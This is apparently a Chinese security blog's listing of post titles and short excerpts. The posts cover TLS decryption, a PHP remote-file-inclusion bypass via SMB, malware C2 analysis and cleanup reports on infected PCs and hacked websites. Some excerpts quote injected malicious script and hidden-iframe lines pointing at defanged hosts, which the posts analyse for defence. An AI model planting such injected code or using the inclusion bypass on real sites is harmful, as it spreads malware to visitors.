- 2024-02-29TLS数据包重组
TLS解密参考以下链接:Wireshark解密TLS报文_在线tls解密-CSDN博客总结:配置环境变量wireshark首选项配置 TLS解密例子Frame2700 Frame2714 分析:Frame2700tcp共分8个segment,Frame2700大小是800bytes,Frame2700大小总大小是1360,Frame2700中剩余的560是下一
- 2024-01-17PHP LFI/RFI Vulnerability attack bypassing remote URL inclusion restriction
FileInclusionvulnerabilityInthePHPConfiguration,"allow_url_include" wrapperby-defaultsetto"Off"whichinstructPHPnototloadremoteHTTPorFTPurls.HencepreventRemoteFileInclusionattack.ButPHPdoesnotblockSMBURL
- 2023-08-05Scientific Internet Surfing
1.Background作为一名烟酒生不管是学习还是那啥都需要一些国外的资源,在windows和安卓平台上都可以找到很多好用的加速器,比如liebao加速器(我本人只用过这个),还有一些博客会推荐Nord或者Express(但是访问不了)博客地址虽然要付费吧,但是物有所值,总归是能解决问题,可是这事放到li
- 2023-08-03Woreflint恶意软件c2分析
WhatisTrojan:Win32/Woreflint.A!clinfection?InthisshortarticleyouwillcertainlydiscoverconcerningthedefinitionofTrojan:Win32/Woreflint.A!clandalsoitsnegativeeffectonyourcomputersystem.Suchransomwareareaformofmalwarethatiscl
- 2023-08-03恶意c2家族反汇编
协议当日家族TOP5及数量HTTPtrojan:win32/emotetcrypt:2162trojan:win32/emotet:453trojan:win32/wacatac:342trojan:win32/smokeloader:181trojan:win32/woreflint:164HTTPStrojan:win32/smokeloader:744virtool:win32/ceeinject:118trojan:win32/wacatac:6
- 2023-01-29Trojan搭建
介绍Trojan-Go是使用Go语言实现的完整的Trojan代理,和Trojan协议以及原版的配置文件格式兼容。支持并且兼容Trojan-GFW版本的绝大多数功能,并扩展了更多的实用功能。Troja
- 2022-12-12遭遇svchoct.exe,vonine.exe,HBKernel32.sys,ssdtti.sys,System.exe,ublhbztl.sys等2
遭遇svchoct.exe,vonine.exe,HBKernel32.sys,ssdtti.sys,System.exe,ublhbztl.sys等2endurer原创2008-10-23第1版 分析好了,就开始修复。先下载bat_do和FileInfo,用File
- 2022-12-08遭遇 Trojan.Win32.KillFiles.m, Packer.Mian007等
遭遇Trojan.Win32.KillFiles.m,Packer.Mian007等endurer原创2007-09-18第1版刚才一位网友说他的电脑最近启动很慢,让偶通过QQ远程协助检查。下载pe_xscan扫描log并分
- 2022-12-08偶遇 Trojan.PSW.Win32.OnlineGames.xym,Trojan.Win32.Agent.vvk等
偶遇Trojan.PSW.Win32.OnlineGames.xym,Trojan.Win32.Agent.vvk等endurer原创2007-09-19 第1版刚才一位网友说他的电脑最近启动一个程序所需时间比较长。让偶通过QQ远程
- 2022-12-08某论坛被加入下载Trojan-clicker.Win32.VB.qq的代码
endurer原创2007-02-01第1版论坛首页被加入代码:/------<scriptlanguage="javascript"src="hxxp://*61.146.118.1*1/news***/include*/m***d5.asp?ad*=1****"></script>----
- 2022-12-08某县农业网被挂马 Trojan.Win32.KillAV.bca/Trojan-Downloader.Win32.Geral.ix
某县农业网被挂马Trojan.Win32.KillAV.bca/Trojan-Downloader.Win32.Geral.ix endurer原创2009-05-05第1版 打开某县农业网,Maxthon提示要安装ActiveX控件。 检查网页
- 2022-12-07抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马
endurer原创2007-05-08第1版一位朋友,说他的电脑最近运行很慢,让偶帮忙检修。下载pe_xscan扫描log并分析,发现如下可疑项:/---pe_xscan07-04-12byPurpleEndurer2007-5
- 2022-12-07某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
endurer原创2007-04-30第1版该网站的留言板页面:/---<Iframeid="fralyb"name="fralyb2"src="kh_lyb.aspx?user=2**5***"scrolling="auto"frameborder="0"width=100%h
- 2022-12-07某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
endurer原创2007-04-29 第1版植入的代码为:/---<iframesrc=hxxp://www.1**8d*m***m.com/d***m*/kehu0739.htmwidth=0height=0>---/kehu0739.htm的内容所用代码为US-ASCII。
- 2022-12-07一位网友的电脑中了Trojan.PSW.OnlineGames.amc
endurer原创2007-04-24第1版昨天,一位网友的电脑中了Trojan.PSW.OnlineGames.amc,虽然被瑞星查杀了,但他不太放心,让偶通过QQ远程协助帮忙检查。一看,瑞星实时监控居然没有开,不
- 2022-12-01Trojan-PSW.Win32.QQPass.ro通过QQ信息中网页传播
endurer原创2006-12-09第1版QQ收到如下信息:/--------www.hrb**wht.com/123***.html这里有我的照片大家去看下顺便给个评价谢谢了--------/该网页的内容为使用自定义函数U
- 2022-11-30某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
某文学论坛被挂马Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avtendurer原创2007-08-19第1版Google了一下,发现Google已经标注了:该网站可能含有恶意软件,有可能会危害您的电
- 2022-11-30遭遇 kapjazy.dll,yhpri.dll,WinSys64.Sys,nwiztlbu.exe,myplayer.com 等2
遭遇kapjazy.dll,yhpri.dll,WinSys64.Sys,nwiztlbu.exe,myplayer.com等2endurer原创2007-09-15第2版补充Kaspersky和瑞星的回复2007-09-14第1版(继1)刚才通过QQ远
- 2022-11-30某论坛所用计数器利用 PPStream,Thunder等漏洞传播Trojan.PSW.Win32.OnlineGames.xzr等
某论坛所用计数器利用PPStream,Thunder等漏洞传播Trojan.PSW.Win32.OnlineGames.xzr等endurer原创2007-09-04第1版刚才打开本地最近新建的一个网站的论坛时,Kaspersky报
- 2022-11-30ARP病毒加入的网址传播 Trojan.PSW.Win32.OnlineGames,Trojan.DL.Win32.Agent.xaa
ARP病毒加入的网址传播Trojan.PSW.Win32.OnlineGames,Trojan.DL.Win32.Agent.xaaendurer原创2007-08-28第1版昨天单位又有电脑中了ARP病毒,打开任一网页时,Kaspersky总报
- 2022-11-30某VIP会员站被挂马 Trojan.Win32.Agent.vty/ down.exe
某VIP会员站被挂马down.exeendurer原创2007-08-23第2版补充瑞星和Kaspersky的回复2007-08-23第1版 有网友反映,他的电脑中的php文件里老是被写入<iframe src=hx
- 2022-11-30遭遇Worm.Win32.Viking,Worm.Win32f.ysv,Trojan.PSW.Win32.OnlineGames等
遭遇Worm.Win32.Viking,Worm.Win32f.ysv,Trojan.PSW.Win32.OnlineGames等endurer原创2007-07-30第1版刚才,“遭遇Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等”一文中
- 2022-11-30ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码
ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码endurer原创2007-07-31第1版前两天,一位网友反映他最近打开网页显示都是乱码。让他把网页源代码传过来分析,发现网
- 2022-11-30遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1endurer原创2007-08-14第1版昨晚一位网友说他的电脑中了病毒,金山毒霸不停的提示发
- 2022-11-30遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等2
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等2endurer原创2007-08-14第1版(继1)禁用系统还原功能。打开任务管理器,终止以下进程:xyh